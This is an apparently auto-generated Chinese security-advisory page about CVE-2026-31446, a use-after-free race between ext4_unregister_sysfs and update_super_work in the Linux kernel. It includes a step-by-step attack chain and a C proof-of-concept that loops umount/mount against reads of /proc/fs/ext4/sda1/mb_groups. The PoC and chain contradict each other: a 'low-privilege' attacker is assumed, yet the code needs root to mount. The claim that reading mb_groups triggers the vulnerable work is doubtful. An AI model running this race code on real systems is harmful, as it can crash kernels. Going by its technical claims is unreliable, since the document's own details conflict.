CVE-2026-31446 CVSS 7.8 高危

CVE-2026-31446: Linux内核ext4释放后重用漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31446

漏洞类型

释放后重用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Linux Kernel

漏洞概述

Linux内核ext4文件系统模块中存在一个高危的释放后重用（UAF）漏洞。该漏洞发生在文件系统卸载过程中，由于`ext4_unregister_sysfs`与`update_super_work`之间存在竞态条件。当`ext4_unregister_sysfs`调用`kobject_del`释放kobject后，并发的`ext4_notify_error_sysfs`函数仍可能尝试访问已释放的kernfs_node，导致内核崩溃或潜在的权限提升。攻击者需本地访问权限并配合用户交互才能触发此漏洞。

技术细节

该漏洞的根因在于对ext4文件系统卸载序列的重排序引入了竞态窗口。之前的提交将`ext4_unregister_sysfs`移到了刷新`s_sb_upd_work`之前，以阻止新的错误工作被排队，但这导致了UAF。具体流程为：`ext4_put_super`执行卸载，调用`ext4_unregister_sysfs`，进而调用`kobject_del`将`kobj->sd`置为NULL并RCU释放内存。此时如果`update_super_work`正在运行，它会调用`ext4_notify_error_sysfs`，该函数内部调用`sysfs_notify`。`sysfs_notify`尝试获取`kn = kobj->sd`，此时`sd`指针可能已经失效，导致对已释放的kernfs_node进行`kernfs_get`操作，引发UAF。修复方案是在`ext4_notify_error_sysfs`中检查`s_kobj.state_in_sysfs`标志，并引入`s_error_notify_mutex`互斥锁来序列化通知与注销操作，防止TOCTOU竞态。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限访问权限。

STEP 2

步骤2

攻击者等待或诱导系统挂载ext4文件系统。

STEP 3

步骤3

攻击者通过读取/proc/fs/ext4/[device]/mb_groups等sysfs接口，触发update_super_work工作队列。

STEP 4

步骤4

攻击者利用竞态窗口，在另一线程或进程中触发文件系统卸载操作。

STEP 5

步骤5

系统在执行ext4_unregister_sysfs释放内存后，update_super_work仍尝试访问该内存，导致UAF，引发内核崩溃或可能实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31446
 * This code attempts to trigger the race condition between
 * ext4_notify_error_sysfs and ext4_unregister_sysfs.
 * Compile: gcc -o poc cve-2026-31446.c -lpthread
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mount.h>
#include <string.h>

// Assume an ext4 filesystem is mounted here
#define MOUNT_POINT "/mnt/test_ext4"
#define DEVICE "/dev/sda1"
#define SYSFS_PATH "/proc/fs/ext4/sda1/mb_groups"

void *unmount_thread(void *arg) {
    char cmd[256];
    while (1) {
        // Attempt to unmount to trigger the teardown sequence
        system("umount " MOUNT_POINT " 2>/dev/null");
        // Remount to keep the loop going for testing purposes (in a real scenario, this happens once)
        system("mount " DEVICE " " MOUNT_POINT " 2>/dev/null");
        usleep(10000); // Short delay
    }
    return NULL;
}

void *trigger_sysfs_thread(void *arg) {
    char buf[1024];
    FILE *fp;
    while (1) {
        // Reading mb_groups triggers ext4_error handling which queues update_super_work
        fp = fopen(SYSFS_PATH, "r");
        if (fp) {
            while (fgets(buf, sizeof(buf), fp)) {
                // Consume file to trigger sysfs interaction
            }
            fclose(fp);
        }
        usleep(1000); // High frequency access
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;

    printf("Starting PoC for CVE-2026-31446...\n");
    printf("Ensure %s is mounted and writable.\n", MOUNT_POINT);

    // Create threads to race against each other
    pthread_create(&t1, NULL, unmount_thread, NULL);
    pthread_create(&t2, NULL, trigger_sysfs_thread, NULL);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    return 0;
}

影响范围

Linux Kernel (主分支及稳定分支，受提交 b98535d09179 影响且未包含补丁的版本)

防御指南

临时缓解措施

建议立即应用内核补丁修复该竞态条件。在无法立即更新内核的情况下，应严格限制本地用户的权限，防止恶意用户利用该漏洞导致系统拒绝服务或潜在的权限提升。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表